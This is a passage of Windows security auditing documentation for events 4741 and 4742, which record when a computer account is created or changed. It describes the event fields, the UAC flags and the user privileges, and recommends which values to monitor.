Account Name [Type = UnicodeString]: the name of the computer account that was created. For example:
WIN81$
Account Domain [Type = UnicodeString]: domain name of created computer account. Formats vary, and
include the following:
Attributes:
SAM Account Name [Type = UnicodeString]: logon name for account used to support clients and servers
from previous versions of Windows (pre-Windows 2000 logon name). The value of sAMAccountName
attribute of new computer object. For example: WIN81$.
Display Name [Type = UnicodeString]: the value of displayName attribute of new computer object. It is a
name displayed in the address book for a particular account (typically – user account). This is usually the
combination of the user's first name, middle initial, and last name. For computer objects, it is optional, and
typically is not set. You can change this attribute by using Active Directory Users and Computers, or through
a script, for example. This parameter might not be captured in the event, and in that case appears as “-”.
User Principal Name [Type = UnicodeString]: internet-style login name for the account, based on the
Internet standard RFC 822. By convention this should map to the account's email name. This parameter
contains the value of userPrincipalName attribute of new computer object. For computer objects, it is
optional, and typically is not set. You can change this attribute by using Active Directory Users and
Computers, or through a script, for example. This parameter might not be captured in the event, and in that
case appears as “-”.
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and specifies
a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the form
\\Server\Share\Directory. This parameter contains the value of homeDirectory attribute of new computer
object. For computer objects, it is optional, and typically is not set. You can change this attribute by using
Active Directory Users and Computers, or through a script, for example. This parameter might not be
captured in the event, and in that case appears as “-”.
Home Drive [Type = UnicodeString]: specifies the drive letter to which to map the UNC path specified by
homeDirectory account’s attribute. The drive letter must be specified in the form “DRIVE_LETTER:”. For
example – “H:”. This parameter contains the value of homeDrive attribute of new computer object. For
computer objects, it is optional, and typically is not set. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. This parameter might not be captured in
the event, and in that case appears as “-”.
Script Path [Type = UnicodeString]: specifies the path of the account's logon script. This parameter contains
the value of scriptPath attribute of new computer object. For computer objects, it is optional, and typically is
not set. You can change this attribute by using Active Directory Users and Computers, or through a script,
for example. This parameter might not be captured in the event, and in that case appears as “-”.
Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null string,
a local absolute path, or a UNC path. This parameter contains the value of profilePath attribute of new
computer object. For computer objects, it is optional, and typically is not set. You can change this attribute by
using Active Directory Users and Computers, or through a script, for example. This parameter might not be
User Workstations [Type = UnicodeString]: contains the list of NetBIOS or DNS names of the computers
from which the user can logon. Each computer name is separated by a comma. The name of a computer is
the sAMAccountName property of a computer object. This parameter contains the value of
userWorkstations attribute of new computer object. For computer objects, it is optional, and typically is not
set. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. This parameter might not be captured in the event, and in that case appears as “-”.
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. For manually
created computer account, using Active Directory Users and Computers snap-in, this field typically has value
“<never>”. For computer account created during standard domain join procedure this field will contains
time when computer object was created, because password creates during domain join procedure. For
example: 8/12/2015 11:41:39 AM. This parameter contains the value of pwdLastSet attribute of new
computer object.
Account Expires [Type = UnicodeString]: the date when the account expires. This parameter contains the
value of accountExpires attribute of new computer object. For computer objects, it is optional, and typically
is not set. You can change this attribute by using Active Directory Users and Computers, or through a script,
for example. This parameter might not be captured in the event, and in that case appears as “-”.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID ) of computer’s object primary group.
Note Relative identifier (RID ) is a variable length number that is assigned to objects at creation and
becomes part of the object's Security Identifier (SID ) that uniquely identifies an account or group within a
domain.
Typically, Primary Group field for new computer accounts has the following values:
516 (Domain Controllers) – for domain controllers.
521 (Read-only Domain Controllers) – for read-only domain controllers (RODC ).
515 (Domain Computers) – for member servers and workstations.
See this article https://support.microsoft.com/kb/243330 for more information. This parameter contains the
value of primaryGroupID attribute of new computer object.
AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present delegated
credentials. Can be changed using Active Directory Users and Computers management console in Delegation
tab of computer account. Typically it is set to “-“ for new computer objects. This parameter contains the value of
AllowedToDelegateTo attribute of new computer object. See description of AllowedToDelegateTo field for
“4742: A computer account was changed” event for more details.
service. If you install multiple instances of a service on computers throughout a forest, each instance must have
its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might
use for authentication. For example, an SPN always includes the name of the host computer on which the
service instance is running, so a service instance might register an SPN for each name or alias of its host.
Old UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user or computer account. Old UAC value always “0x0” for new
computer accounts. This parameter contains the previous value of userAccountControl attribute of
computer object.
New UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user or computer account. This parameter contains the value of
userAccountControl attribute of new computer object.
To decode this value, you can go through the property value definitions in the “Table 7. User’s or Computer’s
account UAC flags.” from largest to smallest. Compare each property value to the flags value in the event. If the
flags value in the event is greater than or equal to the property value, then the property is "set" and applies to that
event. Subtract the property value from the flags value in the event and note that the flag applies and then go on to
the next flag.
Here's an example: Flags value from event: 0x15
Decoding:
• PASSWD_NOTREQD 0x0020
• LOCKOUT 0x0010
• HOMEDIR_REQUIRED 0x0008
• (undeclared) 0x0004
• ACCOUNTDISABLE 0x0002
• SCRIPT 0x0001
0x0020 > 0x15, so PASSWD_NOTREQD does not apply to this event
0x10 < 0x15, so LOCKOUT applies to this event. 0x15 - 0x10 = 0x5
0x4 < 0x5, so the undeclared value is set. We'll pretend it doesn't mean anything. 0x5 - 0x4 = 0x1
0x2 > 0x1, so ACCOUNTDISABLE does not apply to this event
0x1 = 0x1, so SCRIPT applies to this event. 0x1 - 0x1 = 0x0, we're done.
So this UAC flags value decodes to: LOCKOUT and SCRIPT
User Account Control [Type = UnicodeString]: shows the list of changes in userAccountControl attribute.
You will see a line of text for each change. For new computer accounts, when the object for this account was
created, the userAccountControl value was considered to be “0x0”, and then it was changed from “0x0” to
the real value for the account's userAccountControl attribute. See possible values in the table below. In the
“User Account Control field text” column, you can see the text that will be displayed in the User Account
Control field in 4741 event.
USERACCOUNTCONTRO USERACCOUNTCONTRO USER ACCOUNT

FLAG NAME L IN HEXADECIMAL L IN DECIMAL DESCRIPTION CONTROL FIELD TEX T
SCRIPT 0x0001 1 The logon script will Changes of this flag

be run. do not show in 4741
events.
ACCOUNTDISABLE 0x0002 2 The user account is Account Disabled

disabled. Account Enabled
Undeclared 0x0004 4 This flag is undeclared. Changes of this flag

do not show in 4741
events.
HOMEDIR_REQUIRED 0x0008 8 The home folder is 'Home Directory

required. Required' - Enabled
'Home Directory
Required' - Disabled
LOCKOUT 0x0010 16 Changes of this flag

do not show in 4741
events.
PASSWD_NOTREQD 0x0020 32 No password is 'Password Not

'Password Not
PASSWD_CANT_CHA 0x0040 64 The user cannot Changes of this flag

NGE change the password. do not show in 4741
This is a permission events.
on the user's object.
ENCRYPTED_TEXT_PW 0x0080 128 The user can send an 'Encrypted Text

D_ALLOWED encrypted password. Password Allowed' -
Can be set using Disabled
“Store password using 'Encrypted Text
reversible encryption” Password Allowed' -
checkbox. Enabled
TEMP_DUPLICATE_AC 0x0100 256 This is an account for Cannot be set for

COUNT users whose primary computer account.
account is in another
domain. This account
provides user access
to this domain, but
not to any domain
that trusts this
domain. This is
sometimes referred to
as a local user
account.
NORMAL_ACCOUNT 0x0200 512 This is a default 'Normal Account' -

account type that Disabled
represents a typical 'Normal Account' -
user. Enabled
INTERDOMAIN_TRUS 0x0800 2048 This is a permit to Cannot be set for

T_ACCOUNT trust an account for a computer account.
system domain that
trusts other domains.
WORKSTATION_TRUS 0x1000 4096 This is a computer 'Workstation Trust

T_ACCOUNT account for a Account' - Disabled
computer that is 'Workstation Trust
running Microsoft Account' - Enabled
Windows NT 4.0
Workstation,
Microsoft Windows
NT 4.0 Server,
Microsoft Windows
2000 Professional, or
Windows 2000 Server
and is a member of
this domain.
SERVER_TRUST_ACCO 0x2000 8192 This is a computer 'Server Trust Account'

UNT account for a domain - Enabled
controller that is a 'Server Trust Account'
member of this - Disabled
domain.
DONT_EXPIRE_PASSW 0x10000 65536 Represents the 'Don't Expire

ORD password, which Password' - Disabled
should never expire 'Don't Expire
on the account. Password' - Enabled
Can be set using
“Password never
expires” checkbox.
MNS_LOGON_ACCO 0x20000 131072 This is an MNS logon 'MNS Logon Account'

UNT account. - Disabled
'MNS Logon Account'
- Enabled
SMARTCARD_REQUIR 0x40000 262144 When this flag is set, 'Smartcard Required' -

ED it forces the user to Disabled
log on by using a 'Smartcard Required' -
smart card. Enabled
TRUSTED_FOR_DELEG 0x80000 524288 When this flag is set, 'Trusted For

ATION the service account Delegation' - Enabled
(the user or computer 'Trusted For
account) under which Delegation' - Disabled
a service runs is
trusted for Kerberos
delegation. Any such
service can
impersonate a client
requesting the
service. To enable a
service for Kerberos
delegation, you must
set this flag on the
userAccountControl
property of the
service account.
If you enable Kerberos
constraint or
unconstraint
delegation or disable
these types of
delegation in
Delegation tab you
will get this flag
changed.
NOT_DELEGATED 0x100000 1048576 When this flag is set, 'Not Delegated' -

the security context of Disabled
the user is not 'Not Delegated' -
delegated to a service Enabled
even if the service
account is set as
delegation.
Can be set using
“Account is sensitive
and cannot be
delegated” checkbox.
USE_DES_KEY_ONLY 0x200000 2097152 Restrict this principal 'Use DES Key Only' -
to use only Data Disabled
Encryption Standard 'Use DES Key Only' -
(DES) encryption Enabled
types for keys.
Can be set using “Use
Kerberos DES
encryption types for
this account”
checkbox.
DONT_REQ_PREAUTH 0x400000 4194304 This account does not 'Don't Require

require Kerberos pre- Preauth' - Disabled
authentication for 'Don't Require
logging on. Preauth' - Enabled
Can be set using “Do
not require Kerberos
preauthentication”
checkbox.
PASSWORD_EXPIRED 0x800000 8388608 The user's password Changes of this flag

has expired. do not show in 4741
events.
TRUSTED_TO_AUTH_F 0x1000000 16777216 The account is 'Trusted To

OR_DELEGATION enabled for Authenticate For
delegation. This is a Delegation' - Disabled
security-sensitive 'Trusted To
setting. Accounts that Authenticate For
have this option Delegation' - Enabled
enabled should be
tightly controlled. This
setting lets a service
that runs under the
account assume a
client's identity and
authenticate as that
user to other remote
servers on the
network.
If you enable Kerberos
protocol transition
this type of delegation
in Delegation tab you
will get this flag
changed.
PARTIAL_SECRETS_AC 0x04000000 67108864 The account is a read- No information.

COUNT only domain
controller (RODC).
This is a security-
sensitive setting.
Removing this setting
from an RODC
compromises security
on that server.
Table 7. User’s or Computer’s account UAC flags.
User Parameters [Type = UnicodeString]: if you change any setting using Active Directory Users and
Computers management console in Dial-in tab of computer’s account properties, then you will see <value
changed, but not displayed> in this field in “4742(S ): A computer account was changed.” This parameter
might not be captured in the event, and in that case appears as “-”.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains the
value of sIDHistory attribute of new computer object. This parameter might not be captured in the event,
and in that case appears as “-”.
Logon Hours [Type = UnicodeString]: hours that the account is allowed to logon to the domain. The value
of logonHours attribute of new computer object. For computer objects, it is optional, and typically is not set.
You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. You will see <value not set> value for new created computer accounts in event 4741.
DNS Host Name [Type = UnicodeString]: name of computer account as registered in DNS. The value of
dNSHostName attribute of new computer object. For manually created computer account objects this field
has value “-“.
Service Principal Names [Type = UnicodeString]: The list of SPNs, registered for computer account. For
new computer accounts it will typically contain HOST SPNs and RestrictedKrbHost SPNs. The value of
servicePrincipalName attribute of new computer object. For manually created computer objects it is
typically equals “-“. This is an example of Service Principal Names field for new domain joined
workstation:
HOST/Win81.contoso.local
RestrictedKrbHost/Win81.contoso.local
HOST/WIN81
RestrictedKrbHost/WIN81
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in the table below:
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION
SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token of

a process.
With this privilege, the user can initiate
a process to replace the default token
associated with a started subprocess.
SeAuditPrivilege Generate security audits With this privilege, the user can add
entries to the security log.
SeBackupPrivilege Back up files and directories - Required to perform backup

operations.
With this privilege, the user can bypass
file and directory, registry, and other
persistent object permissions for the
purposes of backing up the system.
This privilege causes the system to
grant all read access control to any file,
regardless of the access control list
(ACL) specified for the file. Any access
request other than read is still evaluated
with the ACL. The following access
rights are granted if this privilege is
held:
READ_CONTROL
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_READ
FILE_TRAVERSE
SeChangeNotifyPrivilege Bypass traverse checking Required to receive notifications of

changes to files or directories. This
privilege also causes the system to skip
all traversal access checks.
With this privilege, the user can traverse
directory trees even though the user
may not have permissions on the
traversed directory. This privilege does
not allow the user to list the contents of
a directory, only to traverse directories.
SeCreateGlobalPrivilege Create global objects Required to create named file mapping

objects in the global namespace during
Terminal Services sessions.
SeCreatePagefilePrivilege Create a pagefile With this privilege, the user can create
and change the size of a pagefile.
SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent object.

This privilege is useful to kernel-mode
components that extend the object
namespace. Components that are
running in kernel mode already have
this privilege inherently; it is not
necessary to assign them the privilege.
SeCreateSymbolicLinkPrivilege Create symbolic links Required to create a symbolic link.
SeCreateTokenPrivilege Create a token object Allows a process to create a token

which it can then use to get access to
any local resources when the process
uses NtCreateToken() or other token-
creation APIs.
When a process requires this privilege,
we recommend using the LocalSystem
account (which already includes the
privilege), rather than creating a
separate user account and assigning
this privilege to it.
SeDebugPrivilege Debug programs Required to debug and adjust the

memory of a process owned by another
account.
With this privilege, the user can attach a
debugger to any process or to the
kernel. Developers who are debugging
their own applications do not need this
user right. Developers who are
debugging new system components
need this user right. This user right
provides complete access to sensitive
and critical operating system
components.
SeEnableDelegationPrivilege Enable computer and user accounts to Required to mark user and computer
be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set the
Trusted for Delegation setting on a
user or computer object.
The user or object that is granted this
privilege must have write access to the
account control flags on the user or
computer object. A server process
running on a computer (or under a user
context) that is trusted for delegation
can access resources on another
computer using the delegated
credentials of a client, as long as the
account of the client does not have the
Account cannot be delegated
account control flag set.
SeImpersonatePrivilege Impersonate a client after With this privilege, the user can
authentication impersonate other accounts.
SeIncreaseBasePriorityPrivilege Increase scheduling priority Required to increase the base priority of

a process.
With this privilege, the user can use a
process with Write property access to
another process to increase the
execution priority assigned to the other
process. A user with this privilege can
change the scheduling priority of a
process through the Task Manager user
interface.
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Required to increase the quota assigned
to a process.
With this privilege, the user can change
the maximum memory that can be
consumed by a process.
SeIncreaseWorkingSetPrivilege Increase a process working set Required to allocate more memory for
applications that run in the context of
users.
SeLoadDriverPrivilege Load and unload device drivers Required to load or unload a device
driver.
With this privilege, the user can
dynamically load and unload device
drivers or other code in to kernel mode.
This user right does not apply to Plug
and Play device drivers.
SeLockMemoryPrivilege Lock pages in memory Required to lock physical pages in

memory.
process to keep data in physical
memory, which prevents the system
from paging the data to virtual memory
on disk. Exercising this privilege could
significantly affect system performance
by decreasing the amount of available
random access memory (RAM).
SeMachineAccountPrivilege Add workstations to domain With this privilege, the user can create a
computer account.
This privilege is valid only on domain
controllers.
SeManageVolumePrivilege Perform volume maintenance tasks Required to run maintenance tasks on a

volume, such as remote
defragmentation.
SeProfileSingleProcessPrivilege Profile single process Required to gather profiling information

for a single process.
With this privilege, the user can use
performance monitoring tools to
monitor the performance of non-
system processes.
SeRelabelPrivilege Modify an object label Required to modify the mandatory

integrity level of an object.
SeRemoteShutdownPrivilege Force shutdown from a remote system Required to shut down a system using a
network request.
SeRestorePrivilege Restore files and directories Required to perform restore operations.

grant all write access control to any file,
regardless of the ACL specified for the
file. Any access request other than write
is still evaluated with the ACL.
Additionally, this privilege enables you
to set any valid user or group SID as
the owner of a file. The following access
held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
DELETE
file, directory, registry, and other
persistent objects permissions when
restoring backed up files and directories
and determines which users can set any
valid security principal as the owner of
an object.
SeSecurityPrivilege Manage auditing and security log Required to perform a number of

security-related functions, such as
controlling and viewing audit events in
security event log.
With this privilege, the user can specify
object access auditing options for
individual resources, such as files, Active
Directory objects, and registry keys.
A user with this privilege can also view
and clear the security log.
SeShutdownPrivilege Shut down the system Required to shut down a local system.
SeSyncAgentPrivilege Synchronize directory service data This privilege enables the holder to read
all objects and properties in the
directory, regardless of the protection
on the objects and properties. By
default, it is assigned to the
Administrator and LocalSystem
accounts on domain controllers.
synchronize all directory service data.
This is also known as Active Directory
synchronization.
SeSystemEnvironmentPrivilege Modify firmware environment values Required to modify the nonvolatile RAM
of systems that use this type of
memory to store configuration
information.
SeSystemProfilePrivilege Profile system performance Required to gather profiling information

for the entire system.
monitor the performance of system
processes.
SeSystemtimePrivilege Change the system time Required to modify the system time.
the time and date on the internal clock
of the computer. Users that are
assigned this user right can affect the
appearance of event logs. If the system
time is changed, events that are logged
will reflect this new time, not the actual
time that the events occurred.
SeTakeOwnershipPrivilege Take ownership of files or other objects Required to take ownership of an object
without being granted discretionary
access. This privilege allows the owner
value to be set only to those values that
the holder may legitimately assign as
the owner of an object.
With this privilege, the user can take
ownership of any securable object in the
system, including Active Directory
objects, files and folders, printers,
registry keys, processes, and threads.
SeTcbPrivilege Act as part of the operating system This privilege identifies its holder as part
of the trusted computer base.
This user right allows a process to
impersonate any user without
authentication. The process can
therefore gain access to the same local
resources as that user.
SeTimeZonePrivilege Change the time zone Required to adjust the time zone
associated with the computer's internal
clock.
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted Required to access Credential Manager

caller as a trusted caller.
SeUndockPrivilege Remove computer from docking station Required to undock a laptop.

With this privilege, the user can undock
a portable computer from its docking
station without logging on.
SeUnsolicitedInputPrivilege Not applicable Required to read unsolicited input from

a terminal device.
Table 8. User Privileges.

For 4741(S ): A computer account was created.
Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
If your information security monitoring policy requires you to monitor computer account creation, monitor
this event.
Consider whether to track the following fields and values:
FIELD AND VALUE TO TRACK REASON TO TRACK
SAM Account Name: empty or - This field must contain the computer account name. If it is
empty or -, it might indicate an anomaly.
Display Name is not - Typically these fields are - for new computer accounts. Other
User Principal Name is not - values might indicate an anomaly and should be monitored.
Home Directory is not -
Home Drive is not -
Script Path is not -
Profile Path is not -
User Workstations is not -
AllowedToDelegateTo is not -
Password Last Set is <never> This typically means this is a manually created computer
account, which you might need to monitor.
Account Expires is not <never> Typically this field is <never> for new computer accounts.
Other values might indicate an anomaly and should be
monitored.
Primary Group ID is any value other than 515. Typically, the Primary Group ID value is one of the following:
516 for domain controllers
521 for read only domain controllers (RODCs)
515 for servers and workstations (domain computers)
If the Primary Group ID is 516 or 521, it is a new domain
controller or RODC, and the event should be monitored.
If the value is not 516, 521, or 515, it is not a typical value and
should be monitored.
Old UAC Value is not 0x0 Typically this field is 0x0 for new computer accounts. Other
values might indicate an anomaly and should be monitored.
SID History is not - This field will always be set to - unless the account was
migrated from another domain.
Logon Hours value other than <value not set> This should always be <value not set> for new computer
accounts.
Consider whether to track the following account control flags:
USER ACCOUNT CONTROL FLAG TO TRACK INFORMATION ABOUT THE FLAG
'Encrypted Text Password Allowed' – Enabled Should not be set for computer accounts. By default, it will not
be set, and it cannot be set in the account properties in Active
Directory Users and Computers.
'Server Trust Account' – Enabled Should be enabled only for domain controllers.
'Don't Expire Password' – Enabled Should not be enabled for new computer accounts, because
the password automatically changes every 30 days by default.
For computer accounts, this flag cannot be set in the account
properties in Active Directory Users and Computers.
'Smartcard Required' – Enabled Should not be enabled for new computer accounts.
'Trusted For Delegation' – Enabled Should not be enabled for new member servers and
workstations. It is enabled by default for new domain
controllers.
'Not Delegated' – Enabled Should not be enabled for new computer accounts.
'Use DES Key Only' – Enabled Should not be enabled for new computer accounts. For
computer accounts, it cannot be set in the account properties
in Active Directory Users and Computers.
'Don't Require Preauth' – Enabled Should not be enabled for new computer accounts. For
computer accounts, it cannot be set in the account properties
in Active Directory Users and Computers.
'Trusted To Authenticate For Delegation' – Enabled Should not be enabled for new computer accounts by default.
4742(S): A computer account was changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer Account
Management
Event Description:
This event generates every time a computer
object is changed.
controllers.
You might see the same values for
Subject\Security ID and Computer
Account That Was Changed\Security ID in
this event. This usually happens when you
reboot a computer after adding it to the
domain (the change takes effect after the
reboot).
For each change, a separate 4742 event will be
generated.
Some changes do not invoke a 4742 event, for
example, changes made using Active Directory
Users and Computers management console in
Managed By tab in computer account
properties.
You might see this event without any changes
inside, that is, where all Changed Attributes
apear as “-“. This usually happens when a
change is made to an attribute that is not listed
in the event. In this case there is no way to
determine which attribute was changed. For
example, this would happen if you change the
Description of a group object using the Active Directory Users and Computers administrative console. Also, if the
discretionary access control list (DACL ) is changed, a 4742 event will generate, but all attributes will be “-“.
Important: If you manually change any user-related setting or attribute, for example if you set the
SMARTCARD_REQUIRED flag in userAccountControl for the computer account, then the sAMAccountType
of the computer account will be changed to NORMAL_USER_ACCOUNT and you will get “4738: A user account
was changed” instead of 4742 for this computer account. Essentially, the computer account will “become” a user
account. For NORMAL_USER_ACCOUNT you will always get events from Audit User Account Management
subcategory. We strongly recommend that you avoid changing any user-related settings manually for computer
objects.
Event XML:
- <System>
<Level>0</Level>
<Task>13825</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ComputerAccountChange">-</Data>
<Data Name="TargetUserName">WIN81$</Data>
<Data Name="SubjectLogonId">0x2e80c</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">%%1793</Data>
<Data Name="UserAccountControl">%%2093</Data>
<Data Name="LogonHours">-</Data>
<Data Name="DnsHostName">-</Data>
<Data Name="ServicePrincipalNames">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change Computer object” operation. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that requested the “change Computer
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Computer Account That Was Changed:
Security ID [Type = SID ]: SID of changed computer account. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the computer account that was changed. For
example: WIN81$
Account Domain [Type = UnicodeString]: domain name of changed computer account. Formats vary, and
Changed Attributes:
Note If attribute was not changed it will have “-“ value.
from previous versions of Windows (pre-Windows 2000 logon name). If the value of sAMAccountName
attribute of computer object was changed, you will see the new value here. For example: WIN8$.
Display Name [Type = UnicodeString]: it is a name displayed in the address book for a particular account
(typically – user account). This is usually the combination of the user's first name, middle initial, and last
name. For computer objects, it is optional, and typically is not set. You can change this attribute by using
Active Directory Users and Computers, or through a script, for example. If the value of displayName
attribute of computer object was changed, you will see the new value here.
Internet standard RFC 822. By convention this should map to the account's email name. If the value of
userPrincipalName attribute of computer object was changed, you will see the new value here. For
Directory Users and Computers, or through a script, for example.
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and
specifies a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the
form \\Server\Share\Directory. If the value of homeDirectory attribute of computer object was changed,
you will see the new value here. For computer objects, it is optional, and typically is not set. You can change
this attribute by using Active Directory Users and Computers, or through a script, for example.
example – “H:”. If the value of homeDrive attribute of computer object was changed, you will see the new
value here. For computer objects, it is optional, and typically is not set. You can change this attribute by
using Active Directory Users and Computers, or through a script, for example.
Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. If the value of
scriptPath attribute of computer object was changed, you will see the new value here. For computer
objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users
and Computers, or through a script, for example.
a local absolute path, or a UNC path. If the value of profilePath attribute of computer object was changed,
you will see the new value here. For computer objects, it is optional, and typically is not set. You can change
this attribute by using Active Directory Users and Computers, or through a script, for example.
the sAMAccountName property of a computer object. If the value of userWorkstations attribute of
computer object was changed, you will see the new value here. For computer objects, it is optional, and
typically is not set. You can change this attribute by using Active Directory Users and Computers, or
through a script, for example.
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. If the value of
pwdLastSet attribute of computer object was changed, you will see the new value here. For example:
8/12/2015 11:41:39 AM. This value will be changed, for example, after manual computer account reset
action or automatically every 30 days by default for computer objects.
Account Expires [Type = UnicodeString]: the date when the account expires. If the value of
accountExpires attribute of computer object was changed, you will see the new value here. For computer
objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users
and Computers, or through a script, for example.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID ) of computer’s object primary group.
domain.
This field will contain some value if computer’s object primary group was changed. You can change computer’s
primary group using Active Directory Users and Computers management console in the Member Of tab of
computer object properties. You will see a RID of new primary group as a field value. For example, 515 (Domain
Computers) for workstations, is a default primary group.
Typical Primary Group values for computer accounts:
516 (Domain Controllers) – for domain controllers.
521 (Read-only Domain Controllers) – read-only domain controllers (RODC ).
515 (Domain Computers) – servers and workstations.
See this article https://support.microsoft.com/kb/243330 for more information. If the value of
primaryGroupID attribute of computer object was changed, you will see the new value here.
AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present
delegated credentials. Can be changed using Active Directory Users and Computers management console
in Delegation tab of computer account. If the SPNs list on Delegation tab of a computer account was
changed, you will see the new SPNs list in AllowedToDelegateTo field (note that you will see the new list
instead of changes) of this event. This is an example of AllowedToDelegateTo:
dcom/WIN2012
dcom/WIN2012.contoso.local
If the value of msDS -AllowedToDelegateTo attribute of computer object was changed, you will
see the new value here.
The value can be <value not set>, for example, if delegation was disabled.
script, and other behavior for the user or computer account. This parameter contains the previous value of
userAccountControl attribute of computer object.
script, and other behavior for the user or computer account. If the value of userAccountControl attribute
of computer object was changed, you will see the new value here.
event. Subtract the property value from the flags value in the event and note that the flag applies and then go on
to the next flag.
Decoding:
• LOCKOUT 0x0010
• SCRIPT 0x0001
You will see a line of text for each change. See possible values in here: “Table 7. User’s or Computer’s account
UAC flags.”. In the “User Account Control field text” column, you can see text that will be displayed in the User
Account Control field in 4742 event.
Computers management console in Dial-in tab of computer’s account properties, then you will see <value
changed, but not displayed> in this field.
becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of sIDHistory
attribute of computer object was changed, you will see the new value here.
Logon Hours [Type = UnicodeString]: hours that the account is allowed to logon to the domain. If the
value of logonHours attribute of computer object was changed, you will see the new value here. For
DNS Host Name [Type = UnicodeString]: name of computer account as registered in DNS. If the value of
dNSHostName attribute of computer object was changed, you will see the new value here.
Service Principal Names [Type = UnicodeString]: The list of SPNs, registered for computer account. If
the SPN list of a computer account changed, you will see the new SPN list in Service Principal Names
field (note that you will see the new list instead of changes). If the value of servicePrincipalName attribute
of computer object was changed, you will see the new value here.
Here is an example of Service Principal Names field for new domain joined workstation in event 4742 on
domain controller, after workstation reboots:
HOST/Win81.contoso.local
RestrictedKrbHost/Win81.contoso.local
HOST/WIN81
RestrictedKrbHost/WIN81
TERMSRV/Win81.contoso.local
See full list of user privileges in “Table 8. User Privileges.”.
For 4742(S ): A computer account was changed.
If you have critical domain computer accounts (database servers, domain controllers, administration
workstations, and so on) for which you need to monitor each change, monitor this event with the
“Computer Account That Was Changed\Security ID” that corresponds to the high-value account or
accounts.
If you have computer accounts for which any change in the services list on the Delegation tab should be
monitored, monitor this event when AllowedToDelegateTo is not -. This value means the services list was
changed.
Display Name is not - Typically these fields are - for computer accounts. Other
User Principal Name is not - values might indicate an anomaly and should be monitored.
Home Directory is not -
Home Drive is not -
Script Path is not -
Profile Path is not -
Account Expires is not -
Logon Hours is not -
Password Last Set changes occur more often than usual Changes that are more frequent than the default (typically
once a month) might indicate an anomaly or attack.
Primary Group ID is not 516, 521, or 515 Typically, the Primary Group ID value is one of the following:
516 for domain controllers
521 for read only domain controllers (RODCs)
515 for servers and workstations (domain computers)
Other values should be monitored.
For computer accounts for which the services list (on the If AllowedToDelegateTo is marked <value not set> on
Delegation tab) should not be empty: computers that previously had a services list (on the
AllowedToDelegateTo is marked **<value not set> ** Delegation tab), it means the list was cleared.
Consider whether to track the following account control flags:
'Password Not Required' – Enabled Should not be set for computer accounts. Computer accounts
typically require a password by default, except manually
created computer objects.
'Encrypted Text Password Allowed' – Enabled Should not be set for computer accounts. By default, it will not
be set, and it cannot be set in the account properties in Active
'Server Trust Account' – Enabled Should be enabled only for domain controllers.
'Server Trust Account' – Disabled Should not be disabled for domain controllers.
'Don't Expire Password' – Enabled Should not be enabled for computer accounts, because the
password automatically changes every 30 days by default. For
computer accounts, this flag cannot be set in the account
properties in Active Directory Users and Computers.
'Smartcard Required' – Enabled Should not be enabled for computer accounts.
'Trusted For Delegation' – Enabled Means that Kerberos Constraint or Unconstraint delegation
was enabled for the computer account. We recommend
monitoring this to discover whether it is an approved action
(done by an administrator), a mistake, or a malicious action.
'Trusted For Delegation' – Disabled Means that Kerberos Constraint or Unconstraint delegation
was disabled for the computer account. We recommend
Also, if you have a list of computer accounts for which
delegation is critical and should not be disabled, monitor this
for those accounts.
'Trusted To Authenticate For Delegation' – Enabled Means that Protocol Transition delegation was enabled for the
computer account. We recommend monitoring this to
discover whether it is an approved action (done by an
administrator), a mistake, or a malicious action.
'Trusted To Authenticate For Delegation' – Disabled Means that Protocol Transition delegation was disabled for
the computer account. We recommend monitoring this to
discover whether it is an approved action (done by an
Also, if you have a list of computer accounts for which
delegation is critical and should not be disabled, monitor this
for those accounts.
'Not Delegated' – Enabled Means that Account is sensitive and cannot be delegated
was selected for the computer account. For computer
accounts, this flag cannot be set using the graphical interface.
We recommend monitoring this to discover whether it is an
approved action (done by an administrator), a mistake, or a
